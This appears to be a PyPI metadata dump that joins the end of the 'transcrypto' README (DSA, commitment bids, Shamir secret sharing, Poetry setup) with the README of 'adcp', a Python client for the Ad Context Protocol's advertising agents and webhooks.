shared = dsa.DSASharedPublicKey.NewShared(2048, 520)
print(shared.prime_modulus) # p
print(shared.prime_seed) # q (q | p-1)
print(shared.group_base) # g
# Individual key pair
priv = dsa.DSAPrivateKey.New(shared)
pub = dsa.DSAPublicKey.Copy(priv)
# Safe Sign & verify
msg = b'xyz'
signature = priv.Sign(msg) # can also have associated_data, optionally
assert pub.Verify(msg, signature)
# Raw Sign & verify (message must be 1 ≤ m < q)
msg = 123456789 % shared.prime_seed
sig = priv.RawSign(msg)
assert pub.RawVerify(msg, sig)
```
- ranges:
- `1 ≤ message < q`
- signatures: `(s1, s2)` with `2 ≤ s1, s2 < q`
- errors:
- invalid ranges → `base.InputError`
- inconsistent parameters → `key.CryptoError`
##### Security notes
- Choose **large** parameters (e.g., `p ≥ 2048 bits`, `q ≥ 224 bits`) for non-toy settings.
- In practice, compute `m = int.from_bytes(Hash(message), 'big') % q` before calling `Sign(m)`.
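That hash-then-reduce step can be sketched with `hashlib` (illustration only; note that `% q` is not a perfectly uniform map, though the bias is negligible for properly sized `q`):

```python
import hashlib


def message_to_int(message: bytes, q: int) -> int:
  """Map a byte message to an integer in [1, q) via SHA-256."""
  m = int.from_bytes(hashlib.sha256(message).digest(), 'big') % q
  return m if m != 0 else 1  # RawSign() requires message ≥ 1


q = 1039  # toy prime for illustration; a real q should be ≥ 224 bits
m = message_to_int(b'hello', q)
assert 1 <= m < q
```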
##### Advanced: custom primes generator
```py
# Generate primes (p, q) with q | (p-1); also returns m = (p-1)//q
p, q, m = dsa.NBitRandomDSAPrimes(1024, 160)
assert (p - 1) % q == 0
```
Used internally by `DSASharedPublicKey.NewShared()`.
Search breadth and retry caps are bounded; repeated failures raise `key.CryptoError`.
#### Public Bidding
This is a way of bidding on some commitment (the `secret`) that can be cryptographically proved later to not have been changed. To do that the secret is combined with 2 nonces (random values, `n1` & `n2`) and a hash of it is taken (`H=SHA-512(n1||n2||secret)`). The hash `H` and one nonce `n1` are public and divulged. The other nonce `n2` and the `secret` are kept private and will be used to show `secret` was not changed since the beginning of the process. The nonces guarantee the `secret` cannot be brute-forced or changed after-the-fact. The whole process is as strong as SHA-512 collisions.
```py
from transcrypto.core import bid
# Generate the private and public bids
secret = b'my sealed bid'  # the value you are committing to
bid_priv = bid.PrivateBid512.New(secret)  # this one you keep private
bid_pub = bid.PublicBid512.Copy(bid_priv) # this one you publish
# Checking that a bid is genuine requires the public bid and knowing the nonce and the secret:
print(bid_pub.VerifyBid(private_key, secret_bid)) # these come from a divulged private bid
# of course, you want to also make sure the provided private data matches your version of it, e.g.:
bid_pub_expected = bid.PublicBid512.Copy(bid_priv)
print(bid_pub == bid_pub_expected)
```
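The commitment construction itself (`H = SHA-512(n1 || n2 || secret)`) is simple enough to sketch with `hashlib` — a stand-in to illustrate the scheme, not the library's wire format:

```python
import hashlib
import secrets


def make_bid(secret: bytes) -> tuple[bytes, bytes, bytes]:
  """Return (public_hash, public_nonce_n1, private_nonce_n2)."""
  n1, n2 = secrets.token_bytes(32), secrets.token_bytes(32)
  h = hashlib.sha512(n1 + n2 + secret).digest()
  return h, n1, n2  # publish (h, n1); keep (n2, secret) private


def verify_bid(h: bytes, n1: bytes, n2: bytes, secret: bytes) -> bool:
  """Later, the bidder reveals (n2, secret) and anyone can re-check the hash."""
  return hashlib.sha512(n1 + n2 + secret).digest() == h


h, n1, n2 = make_bid(b'my bid: $100')
assert verify_bid(h, n1, n2, b'my bid: $100')
assert not verify_bid(h, n1, n2, b'my bid: $999')  # a changed secret fails
```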
#### SSS (Shamir Shared Secret)
<https://en.wikipedia.org/wiki/Shamir's_secret_sharing>
This is the information-theoretic SSS but with no authentication or binding between share and secret. Malicious share injection is possible! Add MAC or digital signature in hostile settings. Use at least 128-bit modulus for non-toy deployments; `MakeDataShares()` requires > 256 bits.
```py
from transcrypto.core import sss
# Generate parameters: at least 3 of 5 shares needed,
# coefficients & modulus are 264-bit primes (> 256 bits required for MakeDataShares)
priv = sss.ShamirSharedSecretPrivate.New(3, 264)
pub = sss.ShamirSharedSecretPublic.Copy(priv) # what you publish
print(f'threshold : {pub.minimum}')
print(f'prime mod : {pub.modulus}')
print(f'poly coefficients: {priv.polynomial}') # keep these private!
# Safe Issuing shares
secret = b'xyz'
# Generate 5 shares, each has a copy of the encrypted secret
five_shares = priv.MakeDataShares(secret, 5)
for sh in five_shares:
  print(sh)
# Raw Issuing shares
secret = 0xC0FFEE
# Generate an unlimited stream; here we take 5
five_shares = list(priv.RawShares(secret, max_shares=5))
for sh in five_shares:
  print(f'share {sh.share_key} → {sh.share_value}')
```
A single share object looks like `sss.ShamirSharePrivate(minimum=3, modulus=..., share_key=42, share_value=123456789)`.
```py
# Safe Re-constructing the secret
secret = b'xyz'
five_shares = priv.MakeDataShares(secret, 5)
subset = five_shares[:3] # any 3 distinct shares
recovered = subset[0].RecoverData(subset[1:]) # each share has the encrypted data, pass other shares
assert recovered == secret
# Raw Re-constructing the secret
secret = 0xC0FFEE
five_shares = list(priv.RawShares(secret, max_shares=5))
subset = five_shares[:3] # any 3 distinct shares
recovered = pub.RawRecoverSecret(subset)
assert recovered == secret
```
If you supply fewer than minimum shares you get a `key.CryptoError`, unless you explicitly override:
```py
try:
  pub.RawRecoverSecret(five_shares[:2])  # raises
except Exception as e:
  print(e)  # "unrecoverable secret …"

# Force the interpolation even with 2 points (gives a wrong secret, of course)
print(pub.RawRecoverSecret(five_shares[:2], force_recover=True))
# Checking that a share is genuine
share = five_shares[0]
ok = priv.RawVerifyShare(secret, share) # ▶ True
tampered = sss.ShamirSharePrivate(
    minimum=share.minimum,
    modulus=share.modulus,
    share_key=share.share_key,
    share_value=(share.share_value + 1) % share.modulus)
print(priv.RawVerifyShare(secret, tampered)) # ▶ False
```
## Appendix: Development Instructions
### Setup
If you want to develop for this project, first install Python 3.12 and [Poetry](https://python-poetry.org/docs/cli/). To get the versions you will need, we suggest doing it like this (*Linux*):
```sh
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install git python3 python3-pip pipx python3-dev python3-venv build-essential software-properties-common
sudo add-apt-repository ppa:deadsnakes/ppa # install arbitrary python version
sudo apt-get update
sudo apt-get install python3.12
sudo apt-get remove python3-poetry
python3.12 -m pipx ensurepath
# re-open terminal
pipx install poetry
poetry --version # should be >=2.1
poetry config virtualenvs.in-project true # creates .venv inside project directory
poetry config pypi-token.pypi <TOKEN> # add your personal PyPI project token, if any
```
or this (*Mac*):
```sh
brew update
brew upgrade
brew cleanup -s
brew install git python@3.12 # install arbitrary python version
brew uninstall poetry
python3.12 -m pip install --user pipx
python3.12 -m pipx ensurepath
# re-open terminal
pipx install poetry
poetry --version # should be >=2.1
poetry config virtualenvs.in-project true # creates .venv inside project directory
poetry config pypi-token.pypi <TOKEN> # add your personal PyPI project token, if any
```
Now install the project:
```sh
git clone https://github.com/balparda/transcrypto.git transcrypto
cd transcrypto
poetry env use python3.12 # creates the venv
poetry sync # sync env to project's poetry.lock file
poetry env info # no-op: just to check
poetry run pytest -vvv
# or any command as:
poetry run <any-command>
```
To activate like a regular environment do:
```sh
poetry env activate
# will print activation command which you next execute, or you can do:
source .venv/bin/activate # if .venv is local to the project
source "$(poetry env info --path)/bin/activate" # for other paths
pytest # or other commands
deactivate
```
### Updating Dependencies
To update the `poetry.lock` file to more current versions, run `poetry update`: it will ignore the current lock, update the dependencies, and rewrite the `poetry.lock` file. If you have cache problems, `poetry cache clear PyPI --all` will clean the cache.
To add a new dependency you should do:
```sh
poetry add "pkg>=1.2.3" # regenerates lock, updates env (adds dep to prod code)
poetry add -G dev "pkg>=1.2.3" # adds dep to dev code ("group" dev)
# also remember: "pkg@^1.2.3" = latest 1.* ; "pkg@~1.2.3" = latest 1.2.* ; "pkg@1.2.3" exact
```
If you manually added a dependency to `pyproject.toml` you should ***very carefully*** recreate the environment and files:
```sh
rm -rf .venv .poetry poetry.lock
poetry env use python3.12
poetry install
```
Remember to check your diffs before submitting (especially `poetry.lock`) to avoid surprises!
When dependencies change, always regenerate `requirements.txt` by running:
```sh
make req # or: poetry export --format requirements.txt --without-hashes --output requirements.txt
```
### Creating a New Version
```sh
# bump the version!
poetry version minor # updates 1.6 to 1.7, for example
# or:
poetry version patch # updates 1.6 to 1.6.1
# or:
poetry version <version-number>
# (also updates `pyproject.toml` and `poetry.lock`)
# publish to GIT, including a TAG
git commit -a -m "release version 1.0.2"
git tag 1.0.2
git push
git push --tags
# prepare package for PyPI
poetry build
poetry publish
```
If you changed the CLI interface at all, in any tool, run `make docs` or even better `make ci`.
You can find the slowest tests (`--durations=30` lists the 30 slowest) by running:
```sh
poetry run pytest -vvv -q --durations=30
poetry run pytest -vvv -q --durations=30 -m "not slow" # find slow > 0.1s
poetry run pytest -vvv -q --durations=30 -m "not veryslow" # find veryslow > 1s
poetry run pytest -vvv -q --durations=30 -m slow # check
poetry run pytest -vvv -q --durations=30 -m veryslow # check
```
You can search for flaky tests by running all tests 100 times, or more:
```sh
poetry run pytest --flake-finder --flake-runs=100
poetry run pytest --flake-finder --flake-runs=500 -m "not veryslow"
poetry run pytest --flake-finder --flake-runs=10000 -m "not slow"
```
You can instrument your code to find bottlenecks:
```sh
$ source .venv/bin/activate
$ which transcrypto
/path/to/.venv/bin/transcrypto # place this in the command below:
$ pyinstrument -r html -o dsa_shared.html -- /path/to/.venv/bin/transcrypto -p rsa-key rsa new
$ deactivate
```
Hint: 85%+ is inside `MillerRabinIsPrime()`/`gmpy2.powmod()`...
| text/markdown | Daniel Balparda | balparda@github.com | null | null | Apache-2.0 | cryptography, validation, encryption, signing, random-generation, prime-numbers, aes-encryption, decryption, rsa-cryptography, elgamal-encryption, dsa-algorithm, modular-mathematics, rsa, dsa, elgamal, aes, python, poetry, typer, rich, cli | [
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Operating System :: OS Independent",
"Topic :: Utilities",
"Topic :: Security :: Cryptography"
] | [] | https://github.com/balparda/transcrypto | null | >=3.12 | [] | [] | [] | [
"typer>=0.24",
"rich>=14.3.3",
"platformdirs>=4.9",
"cryptography>=46.0",
"gmpy2>=2.3",
"zstandard>=0.25"
] | [] | [] | [] | [
"Homepage, https://github.com/balparda/transcrypto",
"Repository, https://github.com/balparda/transcrypto",
"Issues, https://github.com/balparda/transcrypto/issues",
"Changelog, https://github.com/balparda/transcrypto/blob/main/CHANGELOG.md",
"PyPI, https://pypi.org/project/transcrypto/"
] | poetry/2.1.3 CPython/3.13.5 Darwin/25.2.0 | 2026-02-20T09:28:16.422207 | transcrypto-2.3.2.tar.gz | 160,312 | 92/9a/80302bd78ca92269e35416c685c54566e8fa31dc53f0d7254ad7705f01d6/transcrypto-2.3.2.tar.gz | source | sdist | null | false | b0fefe0062ea5800366958a0e2d6b586 | 6bc64beff7d23a4b1099b28c358ddb95d999111203a759e1c680830d0a96c28a | 929a80302bd78ca92269e35416c685c54566e8fa31dc53f0d7254ad7705f01d6 | null | [] | 335 |
2.4 | adcp | 3.4.0 | Official Python client for the Ad Context Protocol (AdCP) | # adcp - Python Client for Ad Context Protocol
[](https://badge.fury.io/py/adcp)
[](https://opensource.org/licenses/Apache-2.0)
[](https://www.python.org/downloads/)
Official Python client for the **Ad Context Protocol (AdCP)**. Build distributed advertising operations that work synchronously OR asynchronously with the same code.
## The Core Concept
AdCP operations are **distributed and asynchronous by default**. An agent might:
- Complete your request **immediately** (synchronous)
- Need time to process and **send results via webhook** (asynchronous)
- Ask for **clarifications** before proceeding
- Send periodic **status updates** as work progresses
**Your code stays the same.** You write handlers once, and they work for both sync completions and webhook deliveries.
## Installation
```bash
pip install adcp
```
> **Note**: This client requires Python 3.10 or later and supports both synchronous and asynchronous workflows.
## Quick Start: Test Helpers
The fastest way to get started is using pre-configured test agents with the **`.simple` API**:
```python
from adcp.testing import test_agent
# Zero configuration - just import and call with kwargs!
products = await test_agent.simple.get_products(
brief='Coffee subscription service for busy professionals'
)
print(f"Found {len(products.products)} products")
```
### Simple vs. Standard API
**Every ADCPClient** includes both API styles via the `.simple` accessor:
**Simple API** (`client.simple.*`) - Recommended for examples/prototyping:
```python
from adcp.testing import test_agent
# Kwargs and direct return - raises on error
products = await test_agent.simple.get_products(brief='Coffee brands')
print(products.products[0].name)
```
**Standard API** (`client.*`) - Recommended for production:
```python
from adcp.testing import test_agent
from adcp import GetProductsRequest
# Explicit request objects and TaskResult wrapper
request = GetProductsRequest(brief='Coffee brands')
result = await test_agent.get_products(request)
if result.success and result.data:
print(result.data.products[0].name)
else:
print(f"Error: {result.error}")
```
**When to use which:**
- **Simple API** (`.simple`): Quick testing, documentation, examples, notebooks
- **Standard API**: Production code, complex error handling, webhook workflows
### Available Test Helpers
Pre-configured agents (all include `.simple` accessor):
- **`test_agent`**: MCP test agent with authentication
- **`test_agent_a2a`**: A2A test agent with authentication
- **`test_agent_no_auth`**: MCP test agent without authentication
- **`test_agent_a2a_no_auth`**: A2A test agent without authentication
- **`creative_agent`**: Reference creative agent for preview functionality
- **`test_agent_client`**: Multi-agent client with both protocols
> **Note**: Test agents are rate-limited and for testing/examples only. DO NOT use in production.
See [examples/simple_api_demo.py](examples/simple_api_demo.py) for a complete comparison.
> **Tip**: Import types from the main `adcp` package (e.g., `from adcp import GetProductsRequest`) rather than `adcp.types.generated` for better API stability.
## Quick Start: Distributed Operations
For production use, configure your own agents:
```python
from adcp import ADCPMultiAgentClient, AgentConfig, GetProductsRequest
# Configure agents and handlers (context manager ensures proper cleanup)
async with ADCPMultiAgentClient(
agents=[
AgentConfig(
id="agent_x",
agent_uri="https://agent-x.com",
protocol="a2a"
),
AgentConfig(
id="agent_y",
agent_uri="https://agent-y.com/mcp/",
protocol="mcp"
)
],
# Webhook URL template (macros: {agent_id}, {task_type}, {operation_id})
webhook_url_template="https://myapp.com/webhook/{task_type}/{agent_id}/{operation_id}",
# Activity callback - fires for ALL events
on_activity=lambda activity: print(f"[{activity.type}] {activity.task_type}"),
# Status change handlers
handlers={
"on_get_products_status_change": lambda response, metadata: (
db.save_products(metadata.operation_id, response.products)
if metadata.status == "completed" else None
)
}
) as client:
# Execute operation - library handles operation IDs, webhook URLs, context management
agent = client.agent("agent_x")
request = GetProductsRequest(brief="Coffee brands")
result = await agent.get_products(request)
# Check result
if result.status == "completed":
# Agent completed synchronously!
print(f"✅ Sync completion: {len(result.data.products)} products")
if result.status == "submitted":
# Agent will send webhook when complete
print(f"⏳ Async - webhook registered at: {result.submitted.webhook_url}")
# Connections automatically cleaned up here
```
## Documentation
- **[API Reference](https://adcontextprotocol.github.io/adcp-client-python/)** - Complete API documentation with type signatures and examples
- **[Protocol Spec](https://github.com/adcontextprotocol/adcp)** - Ad Context Protocol specification
- **[Examples](examples/)** - Code examples and usage patterns
The API reference documentation is automatically generated from the code and includes:
- Full type signatures for all methods
- Field descriptions from JSON Schema
- Method documentation with examples
- Searchable interface
## Features
### Test Helpers
Pre-configured test agents for instant prototyping and testing:
```python
from adcp.testing import (
test_agent, test_agent_a2a,
test_agent_no_auth, test_agent_a2a_no_auth,
creative_agent, test_agent_client, create_test_agent
)
from adcp import GetProductsRequest, PreviewCreativeRequest
# 1. Single agent with authentication (MCP)
result = await test_agent.get_products(
GetProductsRequest(brief="Coffee brands")
)
# 2. Single agent with authentication (A2A)
result = await test_agent_a2a.get_products(
GetProductsRequest(brief="Coffee brands")
)
# 3. Single agent WITHOUT authentication (MCP)
# Useful for testing unauthenticated behavior
result = await test_agent_no_auth.get_products(
GetProductsRequest(brief="Coffee brands")
)
# 4. Single agent WITHOUT authentication (A2A)
result = await test_agent_a2a_no_auth.get_products(
GetProductsRequest(brief="Coffee brands")
)
# 5. Creative agent (preview functionality, no auth required)
result = await creative_agent.preview_creative(
PreviewCreativeRequest(
manifest={"format_id": "banner_300x250", "assets": {...}}
)
)
# 6. Multi-agent (parallel execution with both protocols)
results = await test_agent_client.get_products(
GetProductsRequest(brief="Coffee brands")
)
# 7. Custom configuration
from adcp.client import ADCPClient
config = create_test_agent(id="my-test", timeout=60.0)
client = ADCPClient(config)
```
**Use cases:**
- Quick prototyping and experimentation
- Example code and documentation
- Integration testing without mock servers
- Testing authentication behavior (comparing auth vs no-auth results)
- Learning AdCP concepts
**Important:** Test agents are public, rate-limited, and for testing only. Never use in production.
### Full Protocol Support
- **A2A Protocol**: Native support for Agent-to-Agent protocol
- **MCP Protocol**: Native support for Model Context Protocol
- **Auto-detection**: Automatically detect which protocol an agent uses
### Type Safety
Full type hints with Pydantic validation and auto-generated types from the AdCP spec. All commonly-used types are exported from the main `adcp` package for convenience:
```python
from adcp import (
GetProductsRequest,
BrandManifest,
Package,
CpmFixedRatePricingOption,
MediaBuyStatus,
)
# All methods require typed request objects
request = GetProductsRequest(brief="Coffee brands", max_results=10)
result = await agent.get_products(request)
# result: TaskResult[GetProductsResponse]
if result.success:
for product in result.data.products:
print(product.name, product.pricing_options) # Full IDE autocomplete!
# Type-safe pricing with discriminators
pricing = CpmFixedRatePricingOption(
pricing_option_id="cpm_usd",
pricing_model="cpm",
is_fixed=True, # Literal[True] - type checked!
currency="USD",
rate=5.0
)
# Type-safe status enums
if media_buy.status == MediaBuyStatus.active:
print("Media buy is active")
```
**Exported from main package:**
- **Core domain types**: `BrandManifest`, `Creative`, `CreativeManifest`, `MediaBuy`, `Package`
- **Status enums**: `CreativeStatus`, `MediaBuyStatus`, `PackageStatus`, `PricingModel`
- **All 9 pricing options**: `CpcPricingOption`, `CpmFixedRatePricingOption`, `VcpmAuctionPricingOption`, etc.
- **Request/Response types**: All 16 operations with full request/response types
#### Semantic Type Aliases
For discriminated union types (success/error responses), use semantic aliases for clearer code:
```python
from adcp import (
CreateMediaBuySuccessResponse, # Clear: this is the success case
CreateMediaBuyErrorResponse, # Clear: this is the error case
)
def handle_response(
response: CreateMediaBuySuccessResponse | CreateMediaBuyErrorResponse
) -> None:
if isinstance(response, CreateMediaBuySuccessResponse):
print(f"✅ Media buy created: {response.media_buy_id}")
else:
print(f"❌ Errors: {response.errors}")
```
**Available semantic aliases:**
- Response types: `*SuccessResponse` / `*ErrorResponse` (e.g., `CreateMediaBuySuccessResponse`)
- Request variants: `*FormatRequest` / `*ManifestRequest` (e.g., `PreviewCreativeFormatRequest`)
- Preview renders: `PreviewRenderImage` / `PreviewRenderHtml` / `PreviewRenderIframe`
- Activation keys: `PropertyIdActivationKey` / `PropertyTagActivationKey`
See `examples/type_aliases_demo.py` for more examples.
**Import guidelines:**
- ✅ **DO**: Import from main package: `from adcp import GetProductsRequest`
- ✅ **DO**: Use semantic aliases: `from adcp import CreateMediaBuySuccessResponse`
- ⚠️ **AVOID**: Import from internal modules: `from adcp.types._generated import CreateMediaBuyResponse1`
The main package exports provide a stable API while internal generated types may change.
### Multi-Agent Operations
Execute across multiple agents simultaneously:
```python
from adcp import GetProductsRequest
# Parallel execution across all agents
request = GetProductsRequest(brief="Coffee brands")
results = await client.get_products(request)
for result in results:
if result.status == "completed":
print(f"Sync: {len(result.data.products)} products")
elif result.status == "submitted":
print(f"Async: webhook to {result.submitted.webhook_url}")
```
### Webhook Handling
Single endpoint handles all webhooks:
```python
from fastapi import FastAPI, Request
app = FastAPI()
@app.post("/webhook/{task_type}/{agent_id}/{operation_id}")
async def webhook(task_type: str, agent_id: str, operation_id: str, request: Request):
payload = await request.json()
payload["task_type"] = task_type
payload["operation_id"] = operation_id
# Route to agent client - handlers fire automatically
agent = client.agent(agent_id)
await agent.handle_webhook(
payload,
request.headers.get("x-adcp-signature")
)
return {"received": True}
```
### Security
Webhook signature verification built-in:
```python
client = ADCPMultiAgentClient(
agents=agents,
webhook_secret=os.getenv("WEBHOOK_SECRET")
)
# Signatures verified automatically on handle_webhook()
```
### Debug Mode
Enable debug mode to see full request/response details:
```python
agent_config = AgentConfig(
id="agent_x",
agent_uri="https://agent-x.com",
protocol="mcp",
debug=True # Enable debug mode
)
result = await client.agent("agent_x").get_products(brief="Coffee brands")
# Access debug information
if result.debug_info:
print(f"Duration: {result.debug_info.duration_ms}ms")
print(f"Request: {result.debug_info.request}")
print(f"Response: {result.debug_info.response}")
```
Or use the CLI:
```bash
uvx adcp --debug myagent get_products '{"brief":"TV ads"}'
```
### Resource Management
**Why use async context managers?**
- Ensures HTTP connections are properly closed, preventing resource leaks
- Handles cleanup even when exceptions occur
- Required for production applications with connection pooling
- Prevents issues with async task group cleanup in MCP protocol
The recommended pattern uses async context managers:
```python
from adcp import ADCPClient, AgentConfig, GetProductsRequest
# Recommended: Automatic cleanup with context manager
config = AgentConfig(id="agent_x", agent_uri="https://...", protocol="a2a")
async with ADCPClient(config) as client:
request = GetProductsRequest(brief="Coffee brands")
result = await client.get_products(request)
# Connection automatically closed on exit
# Multi-agent client also supports context managers
async with ADCPMultiAgentClient(agents) as client:
# Execute across all agents in parallel
results = await client.get_products(request)
# All agent connections closed automatically (even if some failed)
```
Manual cleanup is available for special cases (e.g., managing client lifecycle manually):
```python
# Use manual cleanup when you need fine-grained control over lifecycle
client = ADCPClient(config)
try:
result = await client.get_products(request)
finally:
await client.close() # Explicit cleanup
```
**When to use manual cleanup:**
- Managing client lifecycle across multiple functions
- Testing scenarios requiring explicit control
- Integration with frameworks that manage resources differently
In most cases, prefer the context manager pattern.
### Error Handling
The library provides a comprehensive exception hierarchy with helpful error messages:
```python
from adcp.exceptions import (
ADCPError, # Base exception
ADCPConnectionError, # Connection failed
ADCPAuthenticationError, # Auth failed (401, 403)
ADCPTimeoutError, # Request timed out
ADCPProtocolError, # Invalid response format
ADCPToolNotFoundError, # Tool not found
ADCPWebhookSignatureError # Invalid webhook signature
)
try:
result = await client.agent("agent_x").get_products(brief="Coffee")
except ADCPAuthenticationError as e:
# Exception includes agent context and helpful suggestions
print(f"Auth failed for {e.agent_id}: {e.message}")
print(f"Suggestion: {e.suggestion}")
except ADCPTimeoutError as e:
print(f"Request timed out after {e.timeout}s")
except ADCPConnectionError as e:
print(f"Connection failed: {e.message}")
print(f"Agent URI: {e.agent_uri}")
except ADCPError as e:
# Catch-all for other AdCP errors
print(f"AdCP error: {e.message}")
```
All exceptions include:
- **Contextual information**: agent ID, URI, and operation details
- **Actionable suggestions**: specific steps to fix common issues
- **Error classification**: proper HTTP status code handling
## Available Tools
All AdCP tools with full type safety:
**Media Buy Lifecycle:**
- `get_products()` - Discover advertising products
- `list_creative_formats()` - Get supported creative formats
- `create_media_buy()` - Create new media buy
- `update_media_buy()` - Update existing media buy
- `sync_creatives()` - Upload/sync creative assets
- `list_creatives()` - List creative assets
- `get_media_buy_delivery()` - Get delivery performance
**Creative Management:**
- `preview_creative()` - Preview creative before building
- `build_creative()` - Generate production-ready creative assets
**Discovery & Accounts:**
- `get_adcp_capabilities()` - Discover agent capabilities and authorized publishers
- `list_accounts()` - List billing accounts
**Audience & Targeting:**
- `get_signals()` - Get audience signals
- `activate_signal()` - Activate audience signals
- `provide_performance_feedback()` - Send performance feedback
## Workflow Examples
### Complete Media Buy Workflow
A typical media buy workflow involves discovering products, creating the buy, and managing creatives:
```python
from adcp import ADCPClient, AgentConfig, GetProductsRequest, CreateMediaBuyRequest
from adcp import BrandManifest, PublisherPropertiesAll
# 1. Connect to agent
config = AgentConfig(id="sales_agent", agent_uri="https://...", protocol="mcp")
async with ADCPClient(config) as client:
# 2. Discover available products
products_result = await client.get_products(
GetProductsRequest(brief="Premium video inventory for coffee brand")
)
if products_result.success:
product = products_result.data.products[0]
print(f"Found product: {product.name}")
# 3. Create media buy reservation
media_buy_result = await client.create_media_buy(
CreateMediaBuyRequest(
brand_manifest=BrandManifest(
name="Coffee Co",
brand_url="https://coffeeco.com",
logo_url="https://coffeeco.com/logo.png",
# ... additional brand details
),
packages=[{
"package_id": product.packages[0].package_id,
"quantity": 1000000 # impressions
}],
publisher_properties=PublisherPropertiesAll(
selection_type="all" # Target all authorized properties
)
)
)
if media_buy_result.success:
media_buy_id = media_buy_result.data.media_buy_id
print(f"✅ Media buy created: {media_buy_id}")
# 4. Update media buy if needed
from adcp import UpdateMediaBuyPackagesRequest
update_result = await client.update_media_buy(
UpdateMediaBuyPackagesRequest(
media_buy_id=media_buy_id,
packages=[{
"package_id": product.packages[0].package_id,
"quantity": 1500000 # Increase budget
}]
)
)
if update_result.success:
print("✅ Media buy updated")
```
### Complete Creative Workflow
Build and deliver production-ready creatives:
```python
from adcp import ADCPClient, AgentConfig
from adcp import PreviewCreativeFormatRequest, BuildCreativeRequest
from adcp import CreativeManifest, PlatformDeployment
# 1. Connect to creative agent
config = AgentConfig(id="creative_agent", agent_uri="https://...", protocol="mcp")
async with ADCPClient(config) as client:
# 2. List available formats
formats_result = await client.list_creative_formats()
if formats_result.success:
format_id = formats_result.data.formats[0].format_id
print(f"Using format: {format_id.id}")
# 3. Preview creative (test before building)
preview_result = await client.preview_creative(
PreviewCreativeFormatRequest(
target_format_id=format_id.id,
inputs={
"headline": "Fresh Coffee Daily",
"cta": "Order Now"
},
output_format="url" # Get preview URL
)
)
if preview_result.success:
preview_url = preview_result.data.renders[0].url
print(f"Preview at: {preview_url}")
# 4. Build production creative
build_result = await client.build_creative(
BuildCreativeRequest(
manifest=CreativeManifest(
format_id=format_id,
brand_url="https://coffeeco.com",
# ... creative content
),
target_format_id=format_id.id,
deployment=PlatformDeployment(
type="platform",
platform_id="google_admanager"
)
)
)
if build_result.success:
vast_url = build_result.data.assets[0].url
print(f"✅ Creative ready: {vast_url}")
```
### Integrated Workflow: Media Buy + Creatives
Combine both workflows for a complete campaign setup:
```python
from adcp import ADCPMultiAgentClient, AgentConfig
from adcp import GetProductsRequest, CreateMediaBuyRequest, BuildCreativeRequest
# Connect to both sales and creative agents
async with ADCPMultiAgentClient(
agents=[
AgentConfig(id="sales", agent_uri="https://sales-agent.com", protocol="mcp"),
AgentConfig(id="creative", agent_uri="https://creative-agent.com", protocol="mcp"),
]
) as client:
# 1. Get products from sales agent
sales_agent = client.agent("sales")
products = await sales_agent.simple.get_products(
brief="Premium video inventory"
)
# 2. Get creative formats from creative agent
creative_agent = client.agent("creative")
formats = await creative_agent.simple.list_creative_formats()
# 3. Build creative asset
creative_result = await creative_agent.build_creative(
BuildCreativeRequest(
manifest=creative_manifest,
target_format_id=formats.formats[0].format_id.id
)
)
# 4. Create media buy with creative
media_buy_result = await sales_agent.create_media_buy(
CreateMediaBuyRequest(
brand_manifest=brand_manifest,
packages=[{"package_id": products.products[0].packages[0].package_id}],
publisher_properties=publisher_properties,
creative_urls=[creative_result.data.assets[0].url]
)
)
print(f"✅ Campaign live: {media_buy_result.data.media_buy_id}")
```
## Property Discovery (AdCP v2.2.0)
Build agent registries by discovering properties agents can sell:
```python
from adcp.discovery import PropertyCrawler, get_property_index
# Crawl agents to discover properties
crawler = PropertyCrawler()
await crawler.crawl_agents([
{"agent_url": "https://agent-x.com", "protocol": "a2a"},
{"agent_url": "https://agent-y.com/mcp/", "protocol": "mcp"}
])
index = get_property_index()
# Query 1: Who can sell this property?
matches = index.find_agents_for_property("domain", "cnn.com")
# Query 2: What can this agent sell?
auth = index.get_agent_authorizations("https://agent-x.com")
# Query 3: Find by tags
premium = index.find_agents_by_property_tags(["premium", "ctv"])
```
## Publisher Authorization Validation
Verify sales agents are authorized to sell publisher properties via adagents.json:
```python
from adcp import (
fetch_adagents,
verify_agent_authorization,
verify_agent_for_property,
)
# Fetch and parse adagents.json from publisher
adagents_data = await fetch_adagents("publisher.com")
# Verify agent authorization for a property
is_authorized = verify_agent_authorization(
adagents_data=adagents_data,
agent_url="https://sales-agent.example.com",
property_type="website",
property_identifiers=[{"type": "domain", "value": "publisher.com"}]
)
# Or use convenience wrapper (fetch + verify in one call)
is_authorized = await verify_agent_for_property(
publisher_domain="publisher.com",
agent_url="https://sales-agent.example.com",
property_identifiers=[{"type": "domain", "value": "publisher.com"}],
property_type="website"
)
```
**Domain Matching Rules:**
- Exact match: `example.com` matches `example.com`
- Common subdomains: `www.example.com` matches `example.com`
- Wildcards: `api.example.com` matches `*.example.com`
- Protocol-agnostic: `http://agent.com` matches `https://agent.com`
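The rules above can be illustrated with a small standalone sketch (written from the rules as stated, not the library's actual matcher):

```python
def _host(s: str) -> str:
    # Protocol-agnostic: drop an optional scheme and any path component
    s = s.split("://", 1)[-1]
    return s.split("/", 1)[0].lower()

def domain_matches(candidate: str, pattern: str) -> bool:
    host, pat = _host(candidate), _host(pattern)
    if host == pat:             # exact: example.com vs example.com
        return True
    if pat.startswith("*."):    # wildcard: api.example.com vs *.example.com
        return host.endswith(pat[1:])
    return host == "www." + pat  # common subdomain: www.example.com vs example.com
```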
**Use Cases:**
- Sales agents verify authorization before accepting media buys
- Publishers test their adagents.json files
- Developer tools build authorization validators
See `examples/adagents_validation.py` for complete examples.
### Authorization Discovery
Discover which publishers have authorized your agent using two approaches:
**1. "Push" Approach** - Ask the agent (recommended, fastest):
```python
from adcp import ADCPClient, GetAdcpCapabilitiesRequest
async with ADCPClient(agent_config) as client:
# Single API call to agent
result = await client.get_adcp_capabilities(GetAdcpCapabilitiesRequest())
if result.success and result.data.media_buy:
portfolio = result.data.media_buy.portfolio
print(f"Authorized for: {portfolio.publisher_domains}")
```
**2. "Pull" Approach** - Check publisher adagents.json files (when you need property details):
```python
from adcp import fetch_agent_authorizations
# Check specific publishers (fetches in parallel)
contexts = await fetch_agent_authorizations(
"https://our-sales-agent.com",
["nytimes.com", "wsj.com", "cnn.com"]
)
for domain, ctx in contexts.items():
print(f"{domain}:")
print(f" Property IDs: {ctx.property_ids}")
print(f" Tags: {ctx.property_tags}")
```
**When to use which:**
- **Push**: Quick discovery, portfolio overview, high-level authorization check
- **Pull**: Property-level details, specific publisher list, works offline
